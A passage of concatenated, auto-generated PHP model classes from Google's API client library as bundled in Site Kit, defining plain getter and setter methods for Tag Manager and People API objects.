setGtagConfig(\Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig $gtagConfig) { $this->gtagConfig = $gtagConfig; } /** * @return GtagConfig */ public function getGtagConfig() { return $this->gtagConfig; } /** * @param Tag */ public function setTag(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag $tag) { $this->tag = $tag; } /** * @return Tag */ public function getTag() { return $this->tag; } /** * @param Transformation */ public function setTransformation(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation $transformation) { $this->transformation = $transformation; } /** * @return Transformation */ public function getTransformation() { return $this->transformation; } /** * @param Trigger */ public function setTrigger(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger $trigger) { $this->trigger = $trigger; } /** * @return Trigger */ public function getTrigger() { return $this->trigger; } /** * @param Variable */ public function setVariable(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable $variable) { $this->variable = $variable; } /** * @return Variable */ public function getVariable() { return $this->variable; } /** * @param Zone */ public function setZone(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone $zone) { $this->zone = $zone; } /** * @return Zone */ public function getZone() { return $this->zone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Entity'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Environment extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; /** * @var string */ public $authorizationCode; /** * @var string */ public $authorizationTimestamp; /** * @var string */ public $containerId; /** * @var string */ public $containerVersionId; /** * @var string */ public $description; /** * @var bool */ public $enableDebug; /** * @var string */ public $environmentId; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $type; /** * @var string */ public $url; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setAuthorizationCode($authorizationCode) { $this->authorizationCode = $authorizationCode; } /** * @return string */ public function getAuthorizationCode() { return $this->authorizationCode; } /** * @param string */ public function setAuthorizationTimestamp($authorizationTimestamp) { $this->authorizationTimestamp = $authorizationTimestamp; } /** * @return string */ public function getAuthorizationTimestamp() { return $this->authorizationTimestamp; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setContainerVersionId($containerVersionId) { $this->containerVersionId = $containerVersionId; } /** * @return string */ public function getContainerVersionId() { return $this->containerVersionId; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param bool */ public function setEnableDebug($enableDebug) { $this->enableDebug = $enableDebug; } /** * @return bool */ public function getEnableDebug() { return $this->enableDebug; } /** * @param string */ public function setEnvironmentId($environmentId) { $this->environmentId = $environmentId; } /** * @return string */ public function getEnvironmentId() { return $this->environmentId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Environment'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListEnabledBuiltInVariablesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'builtInVariable'; protected $builtInVariableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\BuiltInVariable::class; protected $builtInVariableDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param BuiltInVariable[] */ public function setBuiltInVariable($builtInVariable) { $this->builtInVariable = $builtInVariable; } /** * @return BuiltInVariable[] */ public function getBuiltInVariable() { return $this->builtInVariable; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListEnabledBuiltInVariablesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListEnabledBuiltInVariablesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class SetupTag extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $stopOnSetupFailure; /** * @var string */ public $tagName; /** * @param bool */ public function setStopOnSetupFailure($stopOnSetupFailure) { $this->stopOnSetupFailure = $stopOnSetupFailure; } /** * @return bool */ public function getStopOnSetupFailure() { return $this->stopOnSetupFailure; } /** * @param string */ public function setTagName($tagName) { $this->tagName = $tagName; } /** * @return string */ public function getTagName() { return $this->tagName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\SetupTag::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_SetupTag'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Trigger extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'parameter'; /** * @var string */ public $accountId; protected $autoEventFilterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Condition::class; protected $autoEventFilterDataType = 'array'; protected $checkValidationType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $checkValidationDataType = ''; /** * @var string */ public $containerId; protected $continuousTimeMinMillisecondsType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $continuousTimeMinMillisecondsDataType = ''; protected $customEventFilterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Condition::class; protected $customEventFilterDataType = 'array'; protected $eventNameType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $eventNameDataType = ''; protected $filterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Condition::class; protected $filterDataType = 'array'; /** * @var string */ public $fingerprint; protected $horizontalScrollPercentageListType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $horizontalScrollPercentageListDataType = ''; protected $intervalType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $intervalDataType = ''; protected $intervalSecondsType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $intervalSecondsDataType = ''; protected $limitType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $limitDataType = ''; protected $maxTimerLengthSecondsType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $maxTimerLengthSecondsDataType = ''; /** * @var string */ public $name; /** * @var string */ public $notes; protected $parameterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $parameterDataType = 'array'; /** * @var string */ public $parentFolderId; /** * @var string */ public $path; protected $selectorType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $selectorDataType = ''; /** * @var string */ public $tagManagerUrl; protected $totalTimeMinMillisecondsType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $totalTimeMinMillisecondsDataType = ''; /** * @var string */ public $triggerId; /** * @var string */ public $type; protected $uniqueTriggerIdType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $uniqueTriggerIdDataType = ''; protected $verticalScrollPercentageListType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $verticalScrollPercentageListDataType = ''; protected $visibilitySelectorType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $visibilitySelectorDataType = ''; protected $visiblePercentageMaxType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $visiblePercentageMaxDataType = ''; protected $visiblePercentageMinType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $visiblePercentageMinDataType = ''; protected $waitForTagsType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $waitForTagsDataType = ''; protected $waitForTagsTimeoutType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $waitForTagsTimeoutDataType = ''; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param Condition[] */ public function setAutoEventFilter($autoEventFilter) { $this->autoEventFilter = $autoEventFilter; } /** * @return Condition[] */ public function getAutoEventFilter() { return $this->autoEventFilter; } /** * @param Parameter */ public function setCheckValidation(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $checkValidation) { $this->checkValidation = $checkValidation; } /** * @return Parameter */ public function getCheckValidation() { return $this->checkValidation; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param Parameter */ public function setContinuousTimeMinMilliseconds(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $continuousTimeMinMilliseconds) { $this->continuousTimeMinMilliseconds = $continuousTimeMinMilliseconds; } /** * @return Parameter */ public function getContinuousTimeMinMilliseconds() { return $this->continuousTimeMinMilliseconds; } /** * @param Condition[] */ public function setCustomEventFilter($customEventFilter) { $this->customEventFilter = $customEventFilter; } /** * @return Condition[] */ public function getCustomEventFilter() { return $this->customEventFilter; } /** * @param Parameter */ public function setEventName(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $eventName) { $this->eventName = $eventName; } /** * @return Parameter */ public function getEventName() { return $this->eventName; } /** * @param Condition[] */ public function setFilter($filter) { $this->filter = $filter; } /** * @return Condition[] */ public function getFilter() { return $this->filter; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param Parameter */ public function setHorizontalScrollPercentageList(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $horizontalScrollPercentageList) { $this->horizontalScrollPercentageList = $horizontalScrollPercentageList; } /** * @return Parameter */ public function getHorizontalScrollPercentageList() { return $this->horizontalScrollPercentageList; } /** * @param Parameter */ public function setInterval(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $interval) { $this->interval = $interval; } /** * @return Parameter */ public function getInterval() { return $this->interval; } /** * @param Parameter */ public function setIntervalSeconds(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $intervalSeconds) { $this->intervalSeconds = $intervalSeconds; } /** * @return Parameter */ public function getIntervalSeconds() { return $this->intervalSeconds; } /** * @param Parameter */ public function setLimit(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $limit) { $this->limit = $limit; } /** * @return Parameter */ public function getLimit() { return $this->limit; } /** * @param Parameter */ public function setMaxTimerLengthSeconds(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $maxTimerLengthSeconds) { $this->maxTimerLengthSeconds = $maxTimerLengthSeconds; } /** * @return Parameter */ public function getMaxTimerLengthSeconds() { return $this->maxTimerLengthSeconds; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param Parameter[] */ public function setParameter($parameter) { $this->parameter = $parameter; } /** * @return Parameter[] */ public function getParameter() { return $this->parameter; } /** * @param string */ public function setParentFolderId($parentFolderId) { $this->parentFolderId = $parentFolderId; } /** * @return string */ public function getParentFolderId() { return $this->parentFolderId; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param Parameter */ public function setSelector(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $selector) { $this->selector = $selector; } /** * @return Parameter */ public function getSelector() { return $this->selector; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param Parameter */ public function setTotalTimeMinMilliseconds(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $totalTimeMinMilliseconds) { $this->totalTimeMinMilliseconds = $totalTimeMinMilliseconds; } /** * @return Parameter */ public function getTotalTimeMinMilliseconds() { return $this->totalTimeMinMilliseconds; } /** * @param string */ public function setTriggerId($triggerId) { $this->triggerId = $triggerId; } /** * @return string */ public function getTriggerId() { return $this->triggerId; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param Parameter */ public function setUniqueTriggerId(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $uniqueTriggerId) { $this->uniqueTriggerId = $uniqueTriggerId; } /** * @return Parameter */ public function getUniqueTriggerId() { return $this->uniqueTriggerId; } /** * @param Parameter */ public function setVerticalScrollPercentageList(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $verticalScrollPercentageList) { $this->verticalScrollPercentageList = $verticalScrollPercentageList; } /** * @return Parameter */ public function getVerticalScrollPercentageList() { return $this->verticalScrollPercentageList; } /** * @param Parameter */ public function setVisibilitySelector(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $visibilitySelector) { $this->visibilitySelector = $visibilitySelector; } /** * @return Parameter */ public function getVisibilitySelector() { return $this->visibilitySelector; } /** * @param Parameter */ public function setVisiblePercentageMax(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $visiblePercentageMax) { $this->visiblePercentageMax = $visiblePercentageMax; } /** * @return Parameter */ public function getVisiblePercentageMax() { return $this->visiblePercentageMax; } /** * @param Parameter */ public function setVisiblePercentageMin(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $visiblePercentageMin) { $this->visiblePercentageMin = $visiblePercentageMin; } /** * @return Parameter */ public function getVisiblePercentageMin() { return $this->visiblePercentageMin; } /** * @param Parameter */ public function setWaitForTags(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $waitForTags) { $this->waitForTags = $waitForTags; } /** * @return Parameter */ public function getWaitForTags() { return $this->waitForTags; } /** * @param Parameter */ public function setWaitForTagsTimeout(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $waitForTagsTimeout) { $this->waitForTagsTimeout = $waitForTagsTimeout; } /** * @return Parameter */ public function getWaitForTagsTimeout() { return $this->waitForTagsTimeout; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Trigger'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Workspace extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $description; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Workspace'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListEnvironmentsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'environment'; protected $environmentType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment::class; protected $environmentDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Environment[] */ public function setEnvironment($environment) { $this->environment = $environment; } /** * @return Environment[] */ public function getEnvironment() { return $this->environment; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListEnvironmentsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListEnvironmentsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListTransformationsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'transformation'; /** * @var string */ public $nextPageToken; protected $transformationType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class; protected $transformationDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Transformation[] */ public function setTransformation($transformation) { $this->transformation = $transformation; } /** * @return Transformation[] */ public function getTransformation() { return $this->transformation; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTransformationsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListTransformationsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class SyncWorkspaceResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'mergeConflict'; protected $mergeConflictType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\MergeConflict::class; protected $mergeConflictDataType = 'array'; protected $syncStatusType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncStatus::class; protected $syncStatusDataType = ''; /** * @param MergeConflict[] */ public function setMergeConflict($mergeConflict) { $this->mergeConflict = $mergeConflict; } /** * @return MergeConflict[] */ public function getMergeConflict() { return $this->mergeConflict; } /** * @param SyncStatus */ public function setSyncStatus(\Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncStatus $syncStatus) { $this->syncStatus = $syncStatus; } /** * @return SyncStatus */ public function getSyncStatus() { return $this->syncStatus; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncWorkspaceResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_SyncWorkspaceResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Account extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; protected $featuresType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\AccountFeatures::class; protected $featuresDataType = ''; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $path; /** * @var bool */ public $shareData; /** * @var string */ public $tagManagerUrl; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param AccountFeatures */ public function setFeatures(\Google\Site_Kit_Dependencies\Google\Service\TagManager\AccountFeatures $features) { $this->features = $features; } /** * @return AccountFeatures */ public function getFeatures() { return $this->features; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param bool */ public function setShareData($shareData) { $this->shareData = $shareData; } /** * @return bool */ public function getShareData() { return $this->shareData; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Account::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Account'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListVariablesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'variable'; /** * @var string */ public $nextPageToken; protected $variableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class; protected $variableDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Variable[] */ public function setVariable($variable) { $this->variable = $variable; } /** * @return Variable[] */ public function getVariable() { return $this->variable; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListVariablesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListVariablesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class GetPeopleResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'responses'; protected $responsesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PersonResponse::class; protected $responsesDataType = 'array'; /** * @param PersonResponse[] */ public function setResponses($responses) { $this->responses = $responses; } /** * @return PersonResponse[] */ public function getResponses() { return $this->responses; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\GetPeopleResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_GetPeopleResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class UpdateContactGroupRequest extends \Google\Site_Kit_Dependencies\Google\Model { protected $contactGroupType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class; protected $contactGroupDataType = ''; /** * @var string */ public $readGroupFields; /** * @var string */ public $updateGroupFields; /** * @param ContactGroup */ public function setContactGroup(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup $contactGroup) { $this->contactGroup = $contactGroup; } /** * @return ContactGroup */ public function getContactGroup() { return $this->contactGroup; } /** * @param string */ public function setReadGroupFields($readGroupFields) { $this->readGroupFields = $readGroupFields; } /** * @return string */ public function getReadGroupFields() { return $this->readGroupFields; } /** * @param string */ public function setUpdateGroupFields($updateGroupFields) { $this->updateGroupFields = $updateGroupFields; } /** * @return string */ public function getUpdateGroupFields() { return $this->updateGroupFields; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactGroupRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_UpdateContactGroupRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Url extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function 